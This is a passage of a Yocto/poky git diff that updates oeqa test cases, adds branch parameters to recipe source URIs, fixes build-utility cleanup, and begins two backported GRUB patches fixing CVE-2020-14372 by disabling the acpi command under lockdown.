index f703927660..1cac59725d 100644 --- a/poky/meta/lib/oeqa/runtime/cases/parselogs.py +++ b/poky/meta/lib/oeqa/runtime/cases/parselogs.py @@ -32,7 +32,7 @@ common_errors = [ "Failed to load module \"fbdev\"", "Failed to load module fbdev", "Failed to load module glx", - "[drm] Cannot find any crtc or sizes - going 1024x768", + "[drm] Cannot find any crtc or sizes", "_OSC failed (AE_NOT_FOUND); disabling ASPM", "Open ACPI failed (/var/run/acpid.socket) (No such file or directory)", "NX (Execute Disable) protection cannot be enabled: non-PAE kernel!", @@ -61,6 +61,8 @@ common_errors = [ "[rdrand]: Initialization Failed", "[pulseaudio] authkey.c: Failed to open cookie file", "[pulseaudio] authkey.c: Failed to load authentication key", + "was skipped because of a failed condition check", + "was skipped because all trigger condition checks failed", ] video_related = [ @@ -90,6 +92,7 @@ qemux86_common = [ "glamor initialization failed", "blk_update_request: I/O error, dev fd0, sector 0 op 0x0:(READ)", "floppy: error", + 'failed to IDENTIFY (I/O error, err_mask=0x4)', ] + common_errors ignore_errors = { @@ -295,7 +298,7 @@ class ParseLogsTest(OERuntimeTestCase): grepcmd = 'grep ' grepcmd += '-Ei "' for error in errors: - grepcmd += '\<' + error + '\>' + '|' + grepcmd += r'\<' + error + r'\>' + '|' grepcmd = grepcmd[:-1] grepcmd += '" ' + str(log) + " | grep -Eiv \'" @@ -306,13 +309,13 @@ class ParseLogsTest(OERuntimeTestCase): errorlist = ignore_errors['default'] for ignore_error in errorlist: - ignore_error = ignore_error.replace('(', '\(') - ignore_error = ignore_error.replace(')', '\)') + ignore_error = ignore_error.replace('(', r'\(') + ignore_error = ignore_error.replace(')', r'\)') ignore_error = ignore_error.replace("'", '.') - ignore_error = ignore_error.replace('?', '\?') - ignore_error = ignore_error.replace('[', '\[') - ignore_error = ignore_error.replace(']', '\]') - ignore_error = ignore_error.replace('*', '\*') + ignore_error = ignore_error.replace('?', r'\?') + ignore_error = ignore_error.replace('[', r'\[') + ignore_error = ignore_error.replace(']', r'\]') + ignore_error = ignore_error.replace('*', r'\*') ignore_error = ignore_error.replace('0-9', '[0-9]') grepcmd += ignore_error + '|' grepcmd = grepcmd[:-1] diff --git a/poky/meta/lib/oeqa/runtime/context.py b/poky/meta/lib/oeqa/runtime/context.py index 3826f27642..d707ab263a 100644 --- a/poky/meta/lib/oeqa/runtime/context.py +++ b/poky/meta/lib/oeqa/runtime/context.py @@ -5,6 +5,7 @@ # import os +import sys from oeqa.core.context import OETestContext, OETestContextExecutor from oeqa.core.target.ssh import OESSHTarget @@ -119,8 +120,7 @@ class OERuntimeTestContextExecutor(OETestContextExecutor): # XXX: Don't base your targets on this code it will be refactored # in the near future. # Custom target module loading - target_modules_path = kwargs.get('target_modules_path', '') - controller = OERuntimeTestContextExecutor.getControllerModule(target_type, target_modules_path) + controller = OERuntimeTestContextExecutor.getControllerModule(target_type) target = controller(logger, target_ip, server_ip, **kwargs) return target @@ -130,15 +130,15 @@ class OERuntimeTestContextExecutor(OETestContextExecutor): # AttributeError raised if not found. # ImportError raised if a provided module can not be imported. @staticmethod - def getControllerModule(target, target_modules_path): - controllerslist = OERuntimeTestContextExecutor._getControllerModulenames(target_modules_path) + def getControllerModule(target): + controllerslist = OERuntimeTestContextExecutor._getControllerModulenames() controller = OERuntimeTestContextExecutor._loadControllerFromName(target, controllerslist) return controller # Return a list of all python modules in lib/oeqa/controllers for each # layer in bbpath @staticmethod - def _getControllerModulenames(target_modules_path): + def _getControllerModulenames(): controllerslist = [] @@ -153,9 +153,8 @@ class OERuntimeTestContextExecutor(OETestContextExecutor): else: raise RuntimeError("Duplicate controller module found for %s. Layers should create unique controller module names" % module) - extpath = target_modules_path.split(':') - for p in extpath: - controllerpath = os.path.join(p, 'lib', 'oeqa', 'controllers') + for p in sys.path: + controllerpath = os.path.join(p, 'oeqa', 'controllers') if os.path.exists(controllerpath): add_controller_list(controllerpath) return controllerslist @@ -175,16 +174,12 @@ class OERuntimeTestContextExecutor(OETestContextExecutor): # Search for and return a controller or None from given module name @staticmethod def _loadControllerFromModule(target, modulename): - obj = None - # import module, allowing it to raise import exception - module = __import__(modulename, globals(), locals(), [target]) - # look for target class in the module, catching any exceptions as it - # is valid that a module may not have the target class. try: - obj = getattr(module, target) - except: - obj = None - return obj + import importlib + module = importlib.import_module(modulename) + return getattr(module, target) + except AttributeError: + return None @staticmethod def readPackagesManifest(manifest): diff --git a/poky/meta/lib/oeqa/selftest/cases/bbtests.py b/poky/meta/lib/oeqa/selftest/cases/bbtests.py index dc423ec439..e659be5341 100644 --- a/poky/meta/lib/oeqa/selftest/cases/bbtests.py +++ b/poky/meta/lib/oeqa/selftest/cases/bbtests.py @@ -148,9 +148,6 @@ INHERIT_remove = \"report-error\" self.delete_recipeinc('man-db') self.assertEqual(result.status, 1, msg="Command succeded when it should have failed. bitbake output: %s" % result.output) self.assertIn('Fetcher failure: Unable to find file file://invalid anywhere. The paths that were searched were:', result.output) - line = self.getline(result, 'Fetcher failure for URL: \'file://invalid\'. Unable to fetch URL from any source.') - self.assertTrue(line and line.startswith("ERROR:"), msg = "\"invalid\" file \ -doesn't exist, yet fetcher didn't report any error. bitbake output: %s" % result.output) def test_rename_downloaded_file(self): # TODO unique dldir instead of using cleanall @@ -160,7 +157,7 @@ SSTATE_DIR = \"${TOPDIR}/download-selftest\" """) self.track_for_cleanup(os.path.join(self.builddir, "download-selftest")) - data = 'SRC_URI = "${GNU_MIRROR}/aspell/aspell-${PV}.tar.gz;downloadfilename=test-aspell.tar.gz"' + data = 'SRC_URI = "https://downloads.yoctoproject.org/mirror/sources/aspell-${PV}.tar.gz;downloadfilename=test-aspell.tar.gz"' self.write_recipeinc('aspell', data) result = bitbake('-f -c fetch aspell', ignore_status=True) self.delete_recipeinc('aspell') diff --git a/poky/meta/lib/oeqa/selftest/cases/devtool.py b/poky/meta/lib/oeqa/selftest/cases/devtool.py index 0985434238..87e71632ab 100644 --- a/poky/meta/lib/oeqa/selftest/cases/devtool.py +++ b/poky/meta/lib/oeqa/selftest/cases/devtool.py @@ -340,7 +340,7 @@ class DevtoolAddTests(DevtoolBase): checkvars['LIC_FILES_CHKSUM'] = 'file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263' checkvars['S'] = '${WORKDIR}/git' checkvars['PV'] = '0.1+git${SRCPV}' - checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/dbus-wait;protocol=https' + checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/dbus-wait;protocol=https;branch=master' checkvars['SRCREV'] = srcrev checkvars['DEPENDS'] = set(['dbus']) self._test_recipe_contents(recipefile, checkvars, []) @@ -442,6 +442,7 @@ class DevtoolAddTests(DevtoolBase): tempdir = tempfile.mkdtemp(prefix='devtoolqa') self.track_for_cleanup(tempdir) url = 'gitsm://git.yoctoproject.org/mraa' + url_branch = '%s;branch=master' % url checkrev = 'ae127b19a50aa54255e4330ccfdd9a5d058e581d' testrecipe = 'mraa' srcdir = os.path.join(tempdir, testrecipe) @@ -462,7 +463,7 @@ class DevtoolAddTests(DevtoolBase): checkvars = {} checkvars['S'] = '${WORKDIR}/git' checkvars['PV'] = '1.0+git${SRCPV}' - checkvars['SRC_URI'] = url + checkvars['SRC_URI'] = url_branch checkvars['SRCREV'] = '${AUTOREV}' self._test_recipe_contents(recipefile, checkvars, []) # Try with revision and version specified @@ -481,7 +482,7 @@ class DevtoolAddTests(DevtoolBase): checkvars = {} checkvars['S'] = '${WORKDIR}/git' checkvars['PV'] = '1.5+git${SRCPV}' - checkvars['SRC_URI'] = url + checkvars['SRC_URI'] = url_branch checkvars['SRCREV'] = checkrev self._test_recipe_contents(recipefile, checkvars, []) @@ -880,7 +881,7 @@ class DevtoolUpdateTests(DevtoolBase): self._check_repo_status(os.path.dirname(recipefile), expected_status) result = runCmd('git diff %s' % os.path.basename(recipefile), cwd=os.path.dirname(recipefile)) - addlines = ['SRCREV = ".*"', 'SRC_URI = "git://git.infradead.org/mtd-utils.git"'] + addlines = ['SRCREV = ".*"', 'SRC_URI = "git://git.infradead.org/mtd-utils.git;branch=master"'] srcurilines = src_uri.split() srcurilines[0] = 'SRC_URI = "' + srcurilines[0] srcurilines.append('"') diff --git a/poky/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt b/poky/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt new file mode 100644 index 0000000000..f70f10e4db --- /dev/null +++ b/poky/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt @@ -0,0 +1 @@ +A diff --git a/poky/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt b/poky/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt new file mode 100644 index 0000000000..223b7836fb --- /dev/null +++ b/poky/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt @@ -0,0 +1 @@ +B diff --git a/poky/meta/lib/oeqa/selftest/cases/gotoolchain.py b/poky/meta/lib/oeqa/selftest/cases/gotoolchain.py index 3119520f0d..59f80aad28 100644 --- a/poky/meta/lib/oeqa/selftest/cases/gotoolchain.py +++ b/poky/meta/lib/oeqa/selftest/cases/gotoolchain.py @@ -43,6 +43,12 @@ class oeGoToolchainSelfTest(OESelftestTestCase): @classmethod def tearDownClass(cls): + # Go creates file which are readonly + for dirpath, dirnames, filenames in os.walk(cls.tmpdir_SDKQA): + for filename in filenames + dirnames: + f = os.path.join(dirpath, filename) + if not os.path.islink(f): + os.chmod(f, 0o775) shutil.rmtree(cls.tmpdir_SDKQA, ignore_errors=True) super(oeGoToolchainSelfTest, cls).tearDownClass() diff --git a/poky/meta/lib/oeqa/selftest/cases/imagefeatures.py b/poky/meta/lib/oeqa/selftest/cases/imagefeatures.py index 2b9c4998f7..535d80cb86 100644 --- a/poky/meta/lib/oeqa/selftest/cases/imagefeatures.py +++ b/poky/meta/lib/oeqa/selftest/cases/imagefeatures.py @@ -240,7 +240,7 @@ USERADD_GID_TABLES += "files/static-group" def test_no_busybox_base_utils(self): config = """ # Enable x11 -DISTRO_FEATURES_append += "x11" +DISTRO_FEATURES_append = " x11" # Switch to systemd DISTRO_FEATURES += "systemd" diff --git a/poky/meta/lib/oeqa/selftest/cases/recipetool.py b/poky/meta/lib/oeqa/selftest/cases/recipetool.py index c2ade2543a..e8aeea3023 100644 --- a/poky/meta/lib/oeqa/selftest/cases/recipetool.py +++ b/poky/meta/lib/oeqa/selftest/cases/recipetool.py @@ -370,7 +370,7 @@ class RecipetoolTests(RecipetoolBase): tempsrc = os.path.join(self.tempdir, 'srctree') os.makedirs(tempsrc) recipefile = os.path.join(self.tempdir, 'libmatchbox.bb') - srcuri = 'git://git.yoctoproject.org/libmatchbox' + srcuri = 'git://git.yoctoproject.org/libmatchbox;branch=master' result = runCmd(['recipetool', 'create', '-o', recipefile, srcuri + ";rev=9f7cf8895ae2d39c465c04cc78e918c157420269", '-x', tempsrc]) self.assertTrue(os.path.isfile(recipefile), 'recipetool did not create recipe file; output:\n%s' % result.output) checkvars = {} @@ -456,7 +456,7 @@ class RecipetoolTests(RecipetoolBase): self.assertTrue(os.path.isfile(recipefile)) checkvars = {} checkvars['LICENSE'] = set(['Apache-2.0']) - checkvars['SRC_URI'] = 'git://github.com/mesonbuild/meson;protocol=https' + checkvars['SRC_URI'] = 'git://github.com/mesonbuild/meson;protocol=https;branch=master' inherits = ['setuptools3'] self._test_recipe_contents(recipefile, checkvars, inherits) @@ -523,7 +523,7 @@ class RecipetoolTests(RecipetoolBase): self.assertTrue(os.path.isfile(recipefile)) checkvars = {} checkvars['LICENSE'] = set(['GPLv2']) - checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/matchbox-terminal;protocol=http' + checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/matchbox-terminal;protocol=http;branch=master' inherits = ['pkgconfig', 'autotools'] self._test_recipe_contents(recipefile, checkvars, inherits) diff --git a/poky/meta/lib/oeqa/selftest/cases/reproducible.py b/poky/meta/lib/oeqa/selftest/cases/reproducible.py index 0e44ce4dbf..4b606e7e64 100644 --- a/poky/meta/lib/oeqa/selftest/cases/reproducible.py +++ b/poky/meta/lib/oeqa/selftest/cases/reproducible.py @@ -31,7 +31,6 @@ exclude_packages = [ 'bootchart2-doc', 'epiphany', 'gcr', - 'git', 'glide', 'go-dep', 'go-helloworld', @@ -44,7 +43,6 @@ exclude_packages = [ 'libcap-ng', 'libjson', 'libproxy', - 'lsb-release', 'lttng-tools-dbg', 'lttng-tools-ptest', 'ltp', @@ -55,14 +53,12 @@ exclude_packages = [ 'pybootchartgui', 'qemu', 'quilt-ptest', - "rpm", 'rsync', 'ruby', 'stress-ng', 'systemd-bootchart', 'systemtap', 'valgrind-ptest', - 'vim', 'webkitgtk', ] @@ -144,6 +140,32 @@ def compare_file(reference, test, diffutils_sysroot): result.status = SAME return result +def run_diffoscope(a_dir, b_dir, html_dir, **kwargs): + return runCmd(['diffoscope', '--no-default-limits', '--exclude-directory-metadata', 'yes', '--html-dir', html_dir, a_dir, b_dir], + **kwargs) + +class DiffoscopeTests(OESelftestTestCase): + diffoscope_test_files = os.path.join(os.path.dirname(os.path.abspath(__file__)), "diffoscope") + + def test_diffoscope(self): + bitbake("diffoscope-native -c addto_recipe_sysroot") + diffoscope_sysroot = get_bb_var("RECIPE_SYSROOT_NATIVE", "diffoscope-native") + + # Check that diffoscope doesn't return an error when the files compare + # the same (a general check that diffoscope is working) + with tempfile.TemporaryDirectory() as tmpdir: + run_diffoscope('A', 'A', tmpdir, + native_sysroot=diffoscope_sysroot, cwd=self.diffoscope_test_files) + + # Check that diffoscope generates an index.html file when the files are + # different + with tempfile.TemporaryDirectory() as tmpdir: + r = run_diffoscope('A', 'B', tmpdir, + native_sysroot=diffoscope_sysroot, ignore_status=True, cwd=self.diffoscope_test_files) + + self.assertNotEqual(r.status, 0, msg="diffoscope was successful when an error was expected") + self.assertTrue(os.path.exists(os.path.join(tmpdir, 'index.html')), "HTML index not found!") + class ReproducibleTests(OESelftestTestCase): # Test the reproducibility of whatever is built between sstate_targets and targets @@ -321,7 +343,7 @@ class ReproducibleTests(OESelftestTestCase): # Copy jquery to improve the diffoscope output usability self.copy_file(os.path.join(jquery_sysroot, 'usr/share/javascript/jquery/jquery.min.js'), os.path.join(package_html_dir, 'jquery.js')) - runCmd(['diffoscope', '--no-default-limits', '--exclude-directory-metadata', '--html-dir', package_html_dir, 'reproducibleA', 'reproducibleB'], + run_diffoscope('reproducibleA', 'reproducibleB', package_html_dir, native_sysroot=diffoscope_sysroot, ignore_status=True, cwd=package_dir) if fails: diff --git a/poky/meta/lib/oeqa/selftest/cases/runtime_test.py b/poky/meta/lib/oeqa/selftest/cases/runtime_test.py index 353d411681..20dc1c9482 100644 --- a/poky/meta/lib/oeqa/selftest/cases/runtime_test.py +++ b/poky/meta/lib/oeqa/selftest/cases/runtime_test.py @@ -179,6 +179,12 @@ class TestImage(OESelftestTestCase): self.skipTest('virgl isn\'t working with Debian 8') if distro and distro == 'centos-7': self.skipTest('virgl isn\'t working with Centos 7') + if distro and distro == 'centos-8': + self.skipTest('virgl isn\'t working with Centos 8') + if distro and distro == 'fedora-34': + self.skipTest('virgl isn\'t working with Fedora 34') + if distro and distro == 'fedora-35': + self.skipTest('virgl isn\'t working with Fedora 35') if distro and distro == 'opensuseleap-15.0': self.skipTest('virgl isn\'t working with Opensuse 15.0') @@ -216,6 +222,7 @@ class TestImage(OESelftestTestCase): Author: Alexander Kanavin <alex.kanavin@gmail.com> """ import subprocess, os + self.skipTest("Crashes in mesa observed with this test on dunfell: https://bugzilla.yoctoproject.org/show_bug.cgi?id=14527") try: content = os.listdir("/dev/dri") if len([i for i in content if i.startswith('render')]) == 0: diff --git a/poky/meta/lib/oeqa/selftest/cases/sstatetests.py b/poky/meta/lib/oeqa/selftest/cases/sstatetests.py index c46e8ba489..1bfe88c87d 100644 --- a/poky/meta/lib/oeqa/selftest/cases/sstatetests.py +++ b/poky/meta/lib/oeqa/selftest/cases/sstatetests.py @@ -39,7 +39,7 @@ class SStateTests(SStateBase): recipefile = os.path.join(tempdir, "recipes-test", "dbus-wait-test", 'dbus-wait-test_git.bb') os.makedirs(os.path.dirname(recipefile)) - srcuri = 'git://' + srcdir + ';protocol=file' + srcuri = 'git://' + srcdir + ';protocol=file;branch=master' result = runCmd(['recipetool', 'create', '-o', recipefile, srcuri]) self.assertTrue(os.path.isfile(recipefile), 'recipetool did not create recipe file; output:\n%s' % result.output) @@ -137,7 +137,7 @@ class SStateTests(SStateBase): filtered_results.append(r) self.assertTrue(filtered_results == [], msg="Found distro non-specific sstate for: %s (%s)" % (', '.join(map(str, targets)), str(filtered_results))) file_tracker_1 = self.search_sstate('|'.join(map(str, [s + r'.*?\.tgz$' for s in targets])), distro_specific=True, distro_nonspecific=False) - self.assertTrue(len(file_tracker_1) >= len(targets), msg = "Not all sstate files ware created for: %s" % ', '.join(map(str, targets))) + self.assertTrue(len(file_tracker_1) >= len(targets), msg = "Not all sstate files were created for: %s" % ', '.join(map(str, targets))) self.track_for_cleanup(self.distro_specific_sstate + "_old") shutil.copytree(self.distro_specific_sstate, self.distro_specific_sstate + "_old") @@ -146,13 +146,13 @@ class SStateTests(SStateBase): bitbake(['-cclean'] + targets) bitbake(targets) file_tracker_2 = self.search_sstate('|'.join(map(str, [s + r'.*?\.tgz$' for s in targets])), distro_specific=True, distro_nonspecific=False) - self.assertTrue(len(file_tracker_2) >= len(targets), msg = "Not all sstate files ware created for: %s" % ', '.join(map(str, targets))) + self.assertTrue(len(file_tracker_2) >= len(targets), msg = "Not all sstate files were created for: %s" % ', '.join(map(str, targets))) not_recreated = [x for x in file_tracker_1 if x not in file_tracker_2] - self.assertTrue(not_recreated == [], msg="The following sstate files ware not recreated: %s" % ', '.join(map(str, not_recreated))) + self.assertTrue(not_recreated == [], msg="The following sstate files were not recreated: %s" % ', '.join(map(str, not_recreated))) created_once = [x for x in file_tracker_2 if x not in file_tracker_1] - self.assertTrue(created_once == [], msg="The following sstate files ware created only in the second run: %s" % ', '.join(map(str, created_once))) + self.assertTrue(created_once == [], msg="The following sstate files were created only in the second run: %s" % ', '.join(map(str, created_once))) def test_rebuild_distro_specific_sstate_cross_native_targets(self): self.run_test_rebuild_distro_specific_sstate(['binutils-cross-' + self.tune_arch, 'binutils-native'], temp_sstate_location=True) @@ -202,9 +202,9 @@ class SStateTests(SStateBase): actual_remaining_sstate = [x for x in self.search_sstate(target + r'.*?\.tgz$') if not any(pattern in x for pattern in ignore_patterns)] actual_not_expected = [x for x in actual_remaining_sstate if x not in expected_remaining_sstate] - self.assertFalse(actual_not_expected, msg="Files should have been removed but ware not: %s" % ', '.join(map(str, actual_not_expected))) + self.assertFalse(actual_not_expected, msg="Files should have been removed but were not: %s" % ', '.join(map(str, actual_not_expected))) expected_not_actual = [x for x in expected_remaining_sstate if x not in actual_remaining_sstate] - self.assertFalse(expected_not_actual, msg="Extra files ware removed: %s" ', '.join(map(str, expected_not_actual))) + self.assertFalse(expected_not_actual, msg="Extra files were removed: %s" ', '.join(map(str, expected_not_actual))) def test_sstate_cache_management_script_using_pr_1(self): global_config = [] diff --git a/poky/meta/lib/oeqa/selftest/cases/tinfoil.py b/poky/meta/lib/oeqa/selftest/cases/tinfoil.py index a51c6048d3..4fcbe594c9 100644 --- a/poky/meta/lib/oeqa/selftest/cases/tinfoil.py +++ b/poky/meta/lib/oeqa/selftest/cases/tinfoil.py @@ -94,16 +94,15 @@ class TinfoilTests(OESelftestTestCase): pass pattern = 'conf' - res = tinfoil.run_command('findFilesMatchingInDir', pattern, 'conf/machine') + res = tinfoil.run_command('testCookerCommandEvent', pattern) self.assertTrue(res) eventreceived = False commandcomplete = False start = time.time() - # Wait for maximum 60s in total so we'd detect spurious heartbeat events for example - # The test is IO load sensitive too + # Wait for maximum 120s in total so we'd detect spurious heartbeat events for example while (not (eventreceived == True and commandcomplete == True) - and (time.time() - start < 60)): + and (time.time() - start < 120)): # if we received both events (on let's say a good day), we are done event = tinfoil.wait_event(1) if event: @@ -111,7 +110,8 @@ class TinfoilTests(OESelftestTestCase): commandcomplete = True elif isinstance(event, bb.event.FilesMatchingFound): self.assertEqual(pattern, event._pattern) - self.assertIn('qemuarm.conf', event._matches) + self.assertIn('A', event._matches) + self.assertIn('B', event._matches) eventreceived = True elif isinstance(event, logging.LogRecord): continue diff --git a/poky/meta/lib/oeqa/utils/buildproject.py b/poky/meta/lib/oeqa/utils/buildproject.py index e6d80cc8dc..dfb9661868 100644 --- a/poky/meta/lib/oeqa/utils/buildproject.py +++ b/poky/meta/lib/oeqa/utils/buildproject.py @@ -18,6 +18,7 @@ class BuildProject(metaclass=ABCMeta): def __init__(self, uri, foldername=None, tmpdir=None, dl_dir=None): self.uri = uri self.archive = os.path.basename(uri) + self.tempdirobj = None if not tmpdir: self.tempdirobj = tempfile.TemporaryDirectory(prefix='buildproject-') tmpdir = self.tempdirobj.name @@ -57,6 +58,8 @@ class BuildProject(metaclass=ABCMeta): return self._run('cd %s; make install %s' % (self.targetdir, install_args)) def clean(self): + if self.tempdirobj: + self.tempdirobj.cleanup() if not self.needclean: return self._run('rm -rf %s' % self.targetdir) diff --git a/poky/meta/lib/oeqa/utils/qemurunner.py b/poky/meta/lib/oeqa/utils/qemurunner.py index 79db2cc247..de0dff3ff0 100644 --- a/poky/meta/lib/oeqa/utils/qemurunner.py +++ b/poky/meta/lib/oeqa/utils/qemurunner.py @@ -120,7 +120,10 @@ class QemuRunner: import fcntl fl = fcntl.fcntl(o, fcntl.F_GETFL) fcntl.fcntl(o, fcntl.F_SETFL, fl | os.O_NONBLOCK) - return os.read(o.fileno(), 1000000).decode("utf-8") + try: + return os.read(o.fileno(), 1000000).decode("utf-8") + except BlockingIOError: + return "" def handleSIGCHLD(self, signum, frame): @@ -231,7 +234,7 @@ class QemuRunner: r = os.fdopen(r) x = r.read() os.killpg(os.getpgid(self.runqemu.pid), signal.SIGTERM) - sys.exit(0) + os._exit(0) self.logger.debug("runqemu started, pid is %s" % self.runqemu.pid) self.logger.debug("waiting at most %s seconds for qemu pid (%s)" % @@ -435,6 +438,8 @@ class QemuRunner: if self.runqemu.poll() is None: self.logger.debug("Sending SIGKILL to runqemu") os.killpg(os.getpgid(self.runqemu.pid), signal.SIGKILL) + if not self.runqemu.stdout.closed: + self.logger.info("Output from runqemu:\n%s" % self.getOutput(self.runqemu.stdout)) self.runqemu.stdin.close() self.runqemu.stdout.close() self.runqemu_exited = True diff --git a/poky/meta/lib/oeqa/utils/targetbuild.py b/poky/meta/lib/oeqa/utils/targetbuild.py index 1055810ca3..09738add1d 100644 --- a/poky/meta/lib/oeqa/utils/targetbuild.py +++ b/poky/meta/lib/oeqa/utils/targetbuild.py @@ -19,6 +19,7 @@ class BuildProject(metaclass=ABCMeta): self.d = d self.uri = uri self.archive = os.path.basename(uri) + self.tempdirobj = None if not tmpdir: tmpdir = self.d.getVar('WORKDIR') if not tmpdir: @@ -71,9 +72,10 @@ class BuildProject(metaclass=ABCMeta): return self._run('cd %s; make install %s' % (self.targetdir, install_args)) def clean(self): + if self.tempdirobj: + self.tempdirobj.cleanup() self._run('rm -rf %s' % self.targetdir) subprocess.check_call('rm -f %s' % self.localarchive, shell=True) - pass class TargetBuildProject(BuildProject): diff --git a/poky/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb b/poky/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb index 5d6f200a73..e9dfa0770e 100644 --- a/poky/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb +++ b/poky/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb @@ -10,7 +10,7 @@ DEPENDS = "efivar popt" COMPATIBLE_HOST = "(i.86|x86_64|arm|aarch64).*-linux" -SRC_URI = "git://github.com/rhinstaller/efibootmgr.git;protocol=https \ +SRC_URI = "git://github.com/rhinstaller/efibootmgr.git;protocol=https;branch=master \ file://0001-remove-extra-decl.patch \ file://97668ae0bce776a36ea2001dea63d376be8274ac.patch \ " diff --git a/poky/meta/recipes-bsp/efivar/efivar_37.bb b/poky/meta/recipes-bsp/efivar/efivar_37.bb index 5bf121ff6e..fa1fe1ecdf 100644 --- a/poky/meta/recipes-bsp/efivar/efivar_37.bb +++ b/poky/meta/recipes-bsp/efivar/efivar_37.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=6626bb1e20189cfa95f2c508ba286393" COMPATIBLE_HOST = "(i.86|x86_64|arm|aarch64).*-linux" -SRC_URI = "git://github.com/rhinstaller/efivar.git \ +SRC_URI = "git://github.com/rhinstaller/efivar.git;branch=master;protocol=https \ file://determinism.patch \ file://no-werror.patch" SRCREV = "c1d6b10e1ed4ba2be07f385eae5bceb694478a10" diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-14372.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372.patch new file mode 100644 index 0000000000..08e7666cde --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372.patch @@ -0,0 +1,76 @@ +From 0d237c0b90f0c6d4a3662c569b2371ae3ed69574 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas <javierm@redhat.com> +Date: Mon, 28 Sep 2020 20:08:41 +0200 +Subject: [PATCH] acpi: Don't register the acpi command when locked down +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +The command is not allowed when lockdown is enforced. Otherwise an +attacker can instruct the GRUB to load an SSDT table to overwrite +the kernel lockdown configuration and later load and execute +unsigned code. + +Fixes: CVE-2020-14372 + +Reported-by: Máté Kukri <km@mkukri.xyz> +Signed-off-by: Javier Martinez Canillas <javierm@redhat.com> +Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com> + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=3e8e4c0549240fa209acffceb473e1e509b50c95] +CVE: CVE-2020-14372 +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + docs/grub.texi | 5 +++++ + grub-core/commands/acpi.c | 15 ++++++++------- + 2 files changed, 13 insertions(+), 7 deletions(-) + +diff --git a/docs/grub.texi b/docs/grub.texi +index 0786427..47ac7ff 100644 +--- a/docs/grub.texi ++++ b/docs/grub.texi +@@ -3986,6 +3986,11 @@ Normally, this command will replace the Root System Description Pointer + (RSDP) in the Extended BIOS Data Area to point to the new tables. If the + @option{--no-ebda} option is used, the new tables will be known only to + GRUB, but may be used by GRUB's EFI emulation. ++ ++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}). ++ Otherwise an attacker can instruct the GRUB to load an SSDT table to ++ overwrite the kernel lockdown configuration and later load and execute ++ unsigned code. + @end deffn + + +diff --git a/grub-core/commands/acpi.c b/grub-core/commands/acpi.c +index 5a1499a..1215f2a 100644 +--- a/grub-core/commands/acpi.c ++++ b/grub-core/commands/acpi.c +@@ -27,6 +27,7 @@ + #include <grub/mm.h> + #include <grub/memory.h> + #include <grub/i18n.h> ++#include <grub/lockdown.h> + + #ifdef GRUB_MACHINE_EFI + #include <grub/efi/efi.h> +@@ -775,13 +776,13 @@ static grub_extcmd_t cmd; + + GRUB_MOD_INIT(acpi) + { +- cmd = grub_register_extcmd ("acpi", grub_cmd_acpi, 0, +- N_("[-1|-2] [--exclude=TABLE1,TABLE2|" +- "--load-only=TABLE1,TABLE2] FILE1" +- " [FILE2] [...]"), +- N_("Load host ACPI tables and tables " +- "specified by arguments."), +- options); ++ cmd = grub_register_extcmd_lockdown ("acpi", grub_cmd_acpi, 0, ++ N_("[-1|-2] [--exclude=TABLE1,TABLE2|" ++ "--load-only=TABLE1,TABLE2] FILE1" ++ " [FILE2] [...]"), ++ N_("Load host ACPI tables and tables " ++ "specified by arguments."), ++ options); + } + + GRUB_MOD_FINI(acpi) diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch new file mode 100644 index 0000000000..745f335501 --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch @@ -0,0 +1,130 @@ +From fe7a13df6200bda934fcc0246458df249f1ef4f2 Mon Sep 17 00:00:00 2001 +From: Marco A Benatto <mbenatto@redhat.com> +Date: Wed, 23 Sep 2020 11:33:33 -0400 +Subject: [PATCH] verifiers: Move verifiers API to kernel image + +Move verifiers API from a module to the kernel image, so it can be +used there as well. There are no functional changes in this patch. + +Signed-off-by: Marco A Benatto <mbenatto@redhat.com> +Signed-off-by: Javier Martinez Canillas <javierm@redhat.com> +Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com> + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9e95f45ceeef36fcf93cbfffcf004276883dbc99] +CVE: CVE-2020-14372 +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + grub-core/Makefile.am | 1 + + grub-core/Makefile.core.def | 6 +----- + grub-core/kern/main.c | 4 ++++ + grub-core/{commands => kern}/verifiers.c | 8 ++------ + include/grub/verify.h | 9 ++++++--- + 5 files changed, 14 insertions(+), 14 deletions(-) + rename grub-core/{commands => kern}/verifiers.c (97%) + +diff --git a/grub-core/Makefile.am b/grub-core/Makefile.am +index 3ea8e7f..375c30d 100644 +--- a/grub-core/Makefile.am ++++ b/grub-core/Makefile.am +@@ -90,6 +90,7 @@ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/parser.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/partition.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/term.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/time.h ++KERNEL_HEADER_FILES += 